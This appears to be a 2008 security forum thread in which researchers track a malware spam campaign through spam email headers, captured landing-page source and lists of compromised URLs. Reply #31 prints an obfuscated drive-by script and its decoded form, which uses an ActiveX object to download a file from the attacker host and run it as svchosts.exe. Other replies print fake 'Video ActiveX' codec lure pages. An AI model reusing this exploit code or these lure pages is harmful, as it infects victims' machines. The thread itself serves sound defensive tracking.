Author Topic: R-thing  (Read 45017 times)

0 Members and 1 Guest are viewing this topic.

July 18, 2008, 07:39:21 am
Reply #30

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Changed to index1.php

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.giando.altervista.org/index1.php
Server IP: 66.98.138.46 [ ns18.altervista.org ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 18 July 2008
Time: 08:38:29:38
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://www.giando.altervista.org/document_arch.exe">
<title></title>
</head>

<body>
<iframe src="http://www.giando.altervista.org/pindex.php" style="width:1px; height:1px;"></iframe><br>

<div style="text-align:center; padding-top:100px;">
<img src="wait.gif"><br><br>
<a href="http://www.giando.altervista.org/document_arch.exe" style="font-weight:bold; color:#3A74AB; font-size:18px; font-family:Verdana;">Download Now</a>

</div>
</body>
</html>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 18, 2008, 07:46:41 am
Reply #31

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Lovely script at pindex.php;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.giando.altervista.org/pindex.php
Server IP: 66.98.138.46 [ ns18.altervista.org ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 18 July 2008
Time: 08:41:57:41
*****************************************************************
<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>str = "qndy`mh)(:
gtobuhno!qndy`mh)(!z
w`s!doeds!<!enbtldou/bsd`udDmdldou)&nckdbu&(:
doeds/rdu@uushctud)&he&-&doeds&(:
doeds/rdu@uushctud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892@,1&*#1B#*&15G&*#B38#*&D27&(:
usx!z
w`s!`rp!<!doeds/Bsd`udNckdbu)&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:
w`s!`rr!<!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-&&(:
w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&-&&(:
usx!z!`rru/uxqd!<!0:
`rp/nqdo)&F&*#D#*&U&-&iuuq;..vvv/fh`oen/`mudswhru`/nsf..mn`e/qiq&-g`mrd(:
`rp/rdoe)(:!`rru/nqdo)(:
`rru/Vshud)`rp/sdrqnordCnex(:
w`s!hlx`!<!&/..//..rwbinrur/dyd&:
`rru/R`wdUnGhmd)hlx`-3(:
`rru/Bmnrd)(:
|!b`ubi)d(!z|
usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi)d(!z||
b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

Code: [Select]
poexali();
function poexali() {
var ender = document.createElement('object');
ender.setAttribute('id','ender');
ender.setAttribute('classid','c'+'l'+"sid:B"+"D9"+'6C556-65'+"A3-11"+'D0-983A-0'+"0C"+'04F'+"C29"+'E36');
try {
var asq = ender.CreateObject('m'+"sx"+'ml2'+"."+'X'+"ML"+'H'+'TTP','');
var ass = ender.CreateObject("Sh"+"ell.A"+"p"+"plica"+"tion",'');
var asst = ender.CreateObject('a'+'d'+"odb."+'st'+"r"+'eam','');
try { asst.type = 1;
asq.open('G'+"E"+'T','http://www.giando.altervista.org//load.php',false);
asq.send(); asst.open();
asst.Write(asq.responseBody);
var imya = './/..//svchosts.exe';
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try { ass.shellexecute(imya); } catch(e) {}}
catch(e){}}
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 19, 2008, 12:13:02 pm
Reply #32

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
switched to hot.html

email source:
Code: [Select]
Return-Path: <Fadi-kroost@providence-hospital.org>
X-Original-To: postmaster@xxx.de
Delivered-To: postmaster@xxx.de
Received: from 159.40.71-86.rev.gaoland.net (159.40.71-86.rev.gaoland.net [86.71.40.159])
by family.xxx.de (Postfix) with ESMTP id 391C64A380D4
for <postmaster@xxx.de>; Sat, 19 Jul 2008 13:39:45 +0200 (CEST)
To: postmaster@xxx.de
Subject: Dark Knight nemesis finally dead
From: Blyakher <Fadi-kroost@providence-hospital.org>
Content-Type: text/plain; format=flowed; delsp=yes; charset=koi8-r
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Date: Sat, 19 Jul 2008 13:39:44 +0200
Message-ID: <zr.bnpscipguetotv@valued-12ef4461>
User-Agent: Opera Mail/9.50 (Win32)
X-Antivirus: avast! (VPS 080718-1, 18/07/2008), Outbound message
X-Antivirus-Status: Clean
X-DSPAM-Result: Spam
X-DSPAM-Processed: Sat Jul 19 13:39:49 2008
X-DSPAM-Confidence: 0.8059
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 4881d28554298697011158

Book your cheapest holidays for your winter getaway right here.
http://euromultimarca.com/hot.html

--
Using Opera's revolutionary e-mail client: http://www.opera.com/mail/

hxxp://euromultimarca.com/hot.html
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>

<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>

md5sum watch.exe: f422a0f9cd67c465a963610e74f50b17
-> still same file.

July 19, 2008, 07:46:29 pm
Reply #33

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
.... and again

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.teethline.com/start.html
Server IP: 195.110.124.188 [ opus.register.it ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 19 July 2008
Time: 20:46:35:46
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>
<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 19, 2008, 07:57:42 pm
Reply #34

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Updated
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 19, 2008, 08:16:18 pm
Reply #35

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
switched to start.html

email source:
Code: [Select]
Return-Path: <resat-tarsiida@northyorks.gov.uk>
X-Original-To: postmaster@xxx.de
Delivered-To: postmaster@xxx.de
Received: from pc-94-48-74-200.cm.vtr.net (pc-94-48-74-200.cm.vtr.net [200.74.48.94])
by family.xxx.de (Postfix) with ESMTP id 155354A380D2
for <postmaster@xxx.de>; Sat, 19 Jul 2008 21:45:35 +0200 (CEST)
To: postmaster@xxx.de
Subject: How to blackmail without getting caught
From: noonan <resat-tarsiida@northyorks.gov.uk>
Content-Type: text/plain; format=flowed; delsp=yes; charset=koi8-r
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Date: Sat, 19 Jul 2008 15:38:29 -0400
Message-ID: <ja.zcyfybbslxpnnh@jers-nhoiiuw9nk>
User-Agent: Opera Mail/9.50 (Win32)
X-DSPAM-Result: Spam
X-DSPAM-Processed: Sat Jul 19 21:45:43 2008
X-DSPAM-Confidence: 0.6941
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 48824467222301142080570

Banks that almost went bankrupt with your money
http://tino.bike2sale.com/start.html

--
Using Opera's revolutionary e-mail client: http://www.opera.com/mail/

hxxp://tino.bike2sale.com/start.html
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>

<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>

same binary as before.

---
edit:
hxxp://www.highpauleberlin.de/start.html
hxxp://parrocchiadelrosario.eu/start.html
hxxp://thebackporchband.com/start.html
hxxp://www.akvnjbp.com/start.html

July 20, 2008, 01:25:37 pm
Reply #36

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Thanks. :)

July 20, 2008, 09:31:40 pm
Reply #37

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
Code: [Select]
http://fotik.fileserver.ixan.net/start.html

July 20, 2008, 10:25:45 pm
Reply #38

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Latest ....
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 21, 2008, 10:54:42 am
Reply #39

Kayrac

  • Guest
Code: [Select]
www.marbresigranitsmontserrat.com/start.html
http://www.centaurea-ae.org/hot.html
http://www.teatinas.com/news.html
www.eurotakt.sk/news.html
http://agroimpex.com.pl/news.html
nanni.schrod.eu/start.html
sigmasoft.it/start.html

July 21, 2008, 04:49:34 pm
Reply #40

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
They've switched again;

nuovacifet.it/begin.html

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://nuovacifet.it/begin.html
Server IP: 195.110.124.188 [ opus.register.it ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 21 July 2008
Time: 17:50:01:50
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=watch.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="00.html" style="display:none"></iframe>
<div style="text-align:center; padding-top:50px;">
<a href="watch.exe" style="font-weight:bold;"><img src="movie.gif" style="border:0px;"></a><br>
<br>
<a href="watch.exe" style="font-weight:bold;">Download Video</a>
</div>
</body>
</html>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 21, 2008, 11:10:20 pm
Reply #41

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
They've changed again ..... and more interestingly, seem to have ditched the usual site code in favour of;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://afg.es/viewmovie.html
Server IP: 217.76.130.227 [ lwga149.servidoresdns.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 22 July 2008
Time: 00:09:20:09
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Watch Free Movie</TITLE>
<META content=noindex,nofollow,noarchive name=robots>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=codecinst.exe">
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">


<STYLE>.t {
BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; BORDER-LEFT: #666666 1px solid; BORDER-BOTTOM: #666666 1px solid
}
.b1 {
BORDER-RIGHT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; PADDING-LEFT: 0px; FONT-WEIGHT: bold; FONT-SIZE: 12px; BACKGROUND-IMAGE: url(img5.gif); PADDING-BOTTOM: 0px; MARGIN: 0px; BORDER-LEFT: 0px; WIDTH: 104px; COLOR: #fff; PADDING-TOP: 0px; BORDER-BOTTOM: 0px; BACKGROUND-REPEAT: no-repeat; FONT-FAMILY: Arial; HEIGHT: 23px; BACKGROUND-COLOR: #fff
}
.b11 {
BORDER-RIGHT: 0px; PADDING-RIGHT: 0px; BORDER-TOP: 0px; PADDING-LEFT: 0px; FONT-WEIGHT: bold; FONT-SIZE: 12px; BACKGROUND-IMAGE: url(img5.gif); PADDING-BOTTOM: 0px; MARGIN: 0px; BORDER-LEFT: 0px; WIDTH: 104px; COLOR: #fff; PADDING-TOP: 0px; BORDER-BOTTOM: 0px; BACKGROUND-REPEAT: no-repeat; FONT-FAMILY: Arial; HEIGHT: 23px; BACKGROUND-COLOR: #fff; TEXT-DECORATION: underline
}
</STYLE>

<script>
function activex_is_here()
{
    try
    {
        return false;
    }
    catch(e)
    {
        ;
    }

    return false;
}

function releaseMovie() {
if (activex_is_here()) {

}
}function codecDownload()
{
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
}
else {
window.setTimeout("location.href='codecinst.exe'", 3000);
}
}
</script>
</head>

<body color=black>

<script>

codecDownload();

</script>
<script>


var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

if (o.hmode  && isNaN(parseInt(o.root.style.left  ))) o.root.style.left   = "0px";
if (o.vmode  && isNaN(parseInt(o.root.style.top   ))) o.root.style.top    = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right  = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},

start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}

document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;

return false;
},

drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)

Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;
},

end : function()
{
document.onmousemove = null;
document.onmouseup   = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},

fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};

function Down(download,e)
{
if (e!=null && e.keyCode==27)
{ Close();
return;
}
    switch (download)
    {
        case "iax": document.location.href="codecinst.exe"; break;
        Close();
    }

}

function vc() {
if (confirm('Video ActiveX Object Error.\n\nYour browser cannot play this video file.\nClick \'OK\' to download and install missing Video ActiveX Object.')) {
location.href="codecinst.exe";
}
else {
if (alert('Please install new version of Video ActiveX Object.')) {
vc();
}
else {
vc();
}
}
}

function Close()
{
    var p=document.getElementById("popdiv");
    p.style.visibility="hidden";
vc();
}
function Details()
{
alert('You must download Video ActiveX Object to play this video file.');
}

</script>


<div name="popdiv" id="popdiv" onKeyPress="Down('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;">
<table cellpadding="0" cellspacing="0" width="362" height="126">
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="362" height="29" style=" BACKGROUND-IMAGE:URL('/xptop.gif'); height:29px; width:362;"> <!-- win top table -->
<tr>
<td style="color:white; font-family:Tahoma; font-size:13px; font-weight:bold; padding-left:4px;padding-top:1px">&nbsp;&nbsp;Video ActiveX Object Error.</td>
<td width="21" style="padding-right:6px;"><img src="/xpclose.gif" width="21" height="21" onClick="Close();" style="cursor:default;" ></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0" height="97">
<tr>
<td style="background-image:url(/left.gif); background-repeat:repeat-y;" valign="bottom">
<table cellpadding="0" cellspacing="0">
<tr>
<td><img src="/xpleftclm.gif" width="3" height="97"></td>
</tr>
</table>
</td>
<td valign="top">
<table cellpadding="0" cellspacing="0" width="356" bgcolor="ece9d8">
<tr>
<td>
<table cellpadding="0" cellspacing="0" height="59">
<tr>
<td align="center" style="padding-left:20px; padding-top:13px;" valign="top"><img src="/alert.gif" width="31" height="32"></td>
<td align="left" style="font-size:11px;  font-family:Tahoma; padding-left:30px; padding-bottom:8px; padding-right:5px;"><br><b>Video ActiveX Object Error:</b><br>Your browser cannot display this video file.<br><br>You need to download new version of Video ActiveX Object to play this video file.
</td>
</tr>
</table>
</td>
</tr>
<tr>
<tr>
<td style="padding-left:20px; padding-right:20px; padding-bottom:20px; font-family:Tahoma; font-size:11px;" align="center">
<hr><br>
Click Continue to download and install ActiveX Object.

</td>
</tr>
<td>
<table align="center" cellpadding="0" cellspacing="6" height="22">
<tr height="22">
<td><input type="button" value="Continue" onClick="Down('iax');" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" tabindex="1" ID="Button1" NAME="Button1"><br><br></td>
<td></td>
<td><input type="button" value="Cancel" onClick="Close()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
<td><input type="button" value="Details..." onClick="Details()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="100%">
<tr bgcolor="4577ea" style="height:1px;">
<td></td>
</tr> <!-- empty colors -->
<tr bgcolor="0029b5" style="height:1px;">
<td></td>
</tr>
<tr bgcolor="001590" style="height:1px;">
<td></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td style="background-image:url(/right.gif); background-repeat:repeat-y;" valign="bottom">
<table cellpadding="0" cellspacing="0">
<tr>
<td style="padding:0px;"><img src="/xprightclm.gif" width="3" height="97"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>


<script>
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (activex_is_here()) { } else {
setTimeout("Close();", 1000);
}
}
else {
if (activex_is_here()) { } else {
setTimeout("showPopDiv();",2000);
}
}
     
function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}

if(!byFlag) {
var p=document.getElementById("popdiv");

var myWidth = 0, myHeight = 0;
if( typeof( window.innerWidth ) == 'number' ) {
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}

function getScroll() {

var scrOfX = 0, scrOfY = 0;
if( typeof( window.pageYOffset ) == 'number' ) {
scrOfY = window.pageYOffset;
scrOfX = window.pageXOffset;
} else if( document.body && ( document.body.scrollLeft || document.body.scrollTop ) ) {
scrOfY = document.body.scrollTop;
scrOfX = document.body.scrollLeft;
} else if( document.documentElement && ( document.documentElement.scrollLeft || document.documentElement.scrollTop ) ) {
scrOfY = document.documentElement.scrollTop;
scrOfX = document.documentElement.scrollLeft;
}
return [scrOfX, scrOfY];

}

sc = getScroll();
p.style.top = (myHeight/2 - 181)+sc[1]+'px';
p.style.left = (myWidth/2 - 120) + sc[0]+'px';
p.style.visibility = 'visible';
p.focus();
}
}

Drag.init(document.getElementById("popdiv"));
</script>
</div>
     

<CENTER><!-- no title variant of spy partners & ruler cash landings --><A
      href="codecinst.exe"><IMG
      onmouseover="window.status = 'You must download Video ActiveX Object to play this video file.';"
      height=369
      alt="You must download Video ActiveX Object to play this video file."
      src="movierol.gif" width=450 border=0></A>
      </CENTER></DIV><br><center><font color=gray><font size=5>
20 min 5 sec, Raiting 8/10, 148306 views<br>
          79 users are watching this movie right now</CENTER></font></font>


<iframe src="00.html" style="display:none"></iframe>

</BODY></HTML>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 21, 2008, 11:28:09 pm
Reply #42

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Updated list
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 22, 2008, 03:45:41 am
Reply #43

Kayrac

  • Guest
Code: [Select]
finquattro.eu/viewmovie.html
thewindsorhotel.it/viewmovie.html
galvatoledo.com/viewmovie.html

dif file name, still detected by avira

July 22, 2008, 08:50:50 am
Reply #44

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
Code: [Select]
http://www.go-siegmund.de/viewmovie.html
http://www.nepi.si/viewmovie.html
http://asjsiderno.it/viewmovie.html
http://www.bachir.it/viewmovie.html

md5sum codecinst.exe
774f5907bbdf70419b4973db6bb230dd